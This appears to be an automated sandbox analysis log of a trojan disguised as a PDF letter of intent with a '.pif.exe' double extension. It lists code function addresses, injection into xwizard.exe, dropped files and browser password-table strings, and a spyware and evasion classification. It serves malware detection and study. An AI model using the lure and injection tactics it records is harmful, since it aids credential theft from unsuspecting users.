            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305FB762_2_3305FB76
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33015BF02_2_33015BF0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FDDBF92_2_32FDDBF9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33057A462_2_33057A46
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305FA492_2_3305FA49
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33013A6C2_2_33013A6C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBFB802_2_32FBFB80
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33041AA32_2_33041AA3
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303DAAC2_2_3303DAAC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304DAC62_2_3304DAC6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330359102_2_33035910
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA38E02_2_32FA38E0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3300D8002_2_3300D800
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA99502_2_32FA9950
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBB9502_2_32FBB950
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305FF092_2_3305FF09
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA9EB02_2_32FA9EB0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305FFB12_2_3305FFB1
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F63FD52_2_32F63FD5
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F63FD22_2_32F63FD2
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA1F922_2_32FA1F92
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F61CAF2_2_32F61CAF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33051D5A2_2_33051D5A
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33057D732_2_33057D73
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33019C322_2_33019C32
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBFDC02_2_32FBFDC0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA3D402_2_32FA3D40
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305FCF22_2_3305FCF2
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305A3522_2_3305A352
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330603E62_2_330603E6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAE3F02_2_32FAE3F0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330402742_2_33040274
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330202C02_2_330202C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303A1182_2_3303A118
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330281582_2_33028158
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330601AA2_2_330601AA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330581CC2_2_330581CC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330320002_2_33032000
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F901002_2_32F90100
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBC6E02_2_32FBC6E0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9C7C02_2_32F9C7C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA07702_2_32FA0770
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC47502_2_32FC4750
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330605912_2_33060591
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330444202_2_33044420
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330524462_2_33052446
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA05352_2_32FA0535
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304E4F62_2_3304E4F6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305AB402_2_3305AB40
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9EA802_2_32F9EA80
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33056BD72_2_33056BD7
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FCE8F02_2_32FCE8F0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F868B82_2_32F868B8
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3306A9A62_2_3306A9A6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA28402_2_32FA2840
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAA8402_2_32FAA840
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA29A02_2_32FA29A0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB69622_2_32FB6962
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33042F302_2_33042F30
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33014F402_2_33014F40
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB2E902_2_32FB2E90
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301EFA02_2_3301EFA0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA0E592_2_32FA0E59
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FACFE02_2_32FACFE0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305EE262_2_3305EE26
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F92FC82_2_32F92FC8
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305CE932_2_3305CE93
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC0F302_2_32FC0F30
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FE2F282_2_32FE2F28
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305EEDB2_2_3305EEDB
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F90CF22_2_32F90CF2
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303CD1F2_2_3303CD1F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA0C002_2_32FA0C00
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9ADE02_2_32F9ADE0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB8DBF2_2_32FB8DBF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33040CB52_2_33040CB5
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAAD002_2_32FAAD00
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_054FC08A5_2_054FC08A
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_055065495_2_05506549
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_055047955_2_05504795
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_0550479A5_2_0550479A
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_054FDE3A5_2_054FDE3A
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_054FE05A5_2_054FE05A
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_054FC0DA5_2_054FC0DA
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_0551CA6A5_2_0551CA6A
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0484E4F66_2_0484E4F6
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_048444206_2_04844420
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_048524466_2_04852446
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_048605916_2_04860591
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047A05356_2_047A0535
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047BC6E06_2_047BC6E0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047A07706_2_047A0770
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047C47506_2_047C4750
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0479C7C06_2_0479C7C0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_048320006_2_04832000
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_048541A26_2_048541A2
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_048601AA6_2_048601AA
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_048581CC6_2_048581CC
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047901006_2_04790100
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0483A1186_2_0483A118
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_048281586_2_04828158
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_048202C06_2_048202C0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_048402746_2_04840274
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_048603E66_2_048603E6
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047AE3F06_2_047AE3F0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0485A3526_2_0485A352
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04840CB56_2_04840CB5
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047A0C006_2_047A0C00
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04790CF26_2_04790CF2
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047AAD006_2_047AAD00
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0479ADE06_2_0479ADE0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0483CD1F6_2_0483CD1F
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047B8DBF6_2_047B8DBF
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0485CE936_2_0485CE93
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047A0E596_2_047A0E59
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0485EEDB6_2_0485EEDB
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0485EE266_2_0485EE26
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047B2E906_2_047B2E90
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0481EFA06_2_0481EFA0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047C0F306_2_047C0F30
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047E2F286_2_047E2F28
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04792FC86_2_04792FC8
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04842F306_2_04842F30
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04814F406_2_04814F40
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047A28406_2_047A2840
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047AA8406_2_047AA840
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047CE8F06_2_047CE8F0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047868B86_2_047868B8
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047B69626_2_047B6962
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0486A9A66_2_0486A9A6
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047A29A06_2_047A29A0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0479EA806_2_0479EA80
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04856BD76_2_04856BD7
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0485AB406_2_0485AB40
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047914606_2_04791460
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0485F43F6_2_0485F43F
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0483D5B06_2_0483D5B0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_048695C36_2_048695C3
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_048575716_2_04857571
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_048516CC6_2_048516CC
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047E56306_2_047E5630
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0485F7B06_2_0485F7B0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0484F0CC6_2_0484F0CC
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0485F0E06_2_0485F0E0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_048570E96_2_048570E9
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047A70C06_2_047A70C0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0478F1726_2_0478F172
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047D516C6_2_047D516C
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047AB1B06_2_047AB1B0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0486B16B6_2_0486B16B
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_048412ED6_2_048412ED
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047BD2F06_2_047BD2F0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047BB2C06_2_047BB2C0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047A52A06_2_047A52A0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0478D34C6_2_0478D34C
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0485132D6_2_0485132D
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047E739A6_2_047E739A
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0485FCF26_2_0485FCF2
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04819C326_2_04819C32
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047A3D406_2_047A3D40
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047BFDC06_2_047BFDC0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04851D5A6_2_04851D5A
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04857D736_2_04857D73
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047A9EB06_2_047A9EB0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0485FFB16_2_0485FFB1
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0485FF096_2_0485FF09
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04763FD56_2_04763FD5
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04763FD26_2_04763FD2
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047A1F926_2_047A1F92
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0480D8006_2_0480D800
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047A38E06_2_047A38E0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047A99506_2_047A9950
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047BB9506_2_047BB950
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_048359106_2_04835910
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04841AA36_2_04841AA3
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0483DAAC6_2_0483DAAC
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0484DAC66_2_0484DAC6
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04857A466_2_04857A46
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0485FA496_2_0485FA49
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047E5AA06_2_047E5AA0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04813A6C6_2_04813A6C
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04815BF06_2_04815BF0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047DDBF96_2_047DDBF9
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0485FB766_2_0485FB76
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047BFB806_2_047BFB80
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028B20006_2_028B2000
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028ACF406_2_028ACF40
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028AB1E06_2_028AB1E0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028AD1606_2_028AD160
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028B56506_2_028B5650
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028CBB706_2_028CBB70
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028B389B6_2_028B389B
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028B38A06_2_028B38A0
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04ABE6CC6_2_04ABE6CC
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04ABD7986_2_04ABD798
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04ABE2146_2_04ABE214
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04ABE3336_2_04ABE333
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_04ABCA446_2_04ABCA44
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 0481F290 appears 103 times
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 047E7E54 appears 107 times
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 0478B970 appears 262 times
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 047D5130 appears 58 times
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 0480EA12 appears 86 times
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: String function: 32FE7E54 appears 100 times
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: String function: 32F8B970 appears 262 times
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: String function: 3300EA12 appears 86 times
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: String function: 32FD5130 appears 58 times
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: String function: 3301F290 appears 105 times
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameterrorist sumpegnene.exeDVarFileInfo$ vs Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2315947683.0000000002D21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexwizard.exej% vs Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2316042059.0000000002D2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexwizard.exej% vs Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2254898946.0000000032EE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.0000000033231000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2252886370.0000000032D2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000000.1946731635.000000000045D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameterrorist sumpegnene.exeDVarFileInfo$ vs Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeBinary or memory string: OriginalFilenameterrorist sumpegnene.exeDVarFileInfo$ vs Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/14@6/6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_00404430 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404430
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeFile created: C:\Users\user\Chiliahedron.lnkJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeFile created: C:\Users\user\AppData\Local\Temp\nsi7130.tmpJump to behavior
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: xwizard.exe, 00000006.00000003.2531025886.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3107060521.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000003.2531843480.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeReversingLabs: Detection: 42%
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeFile read: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"
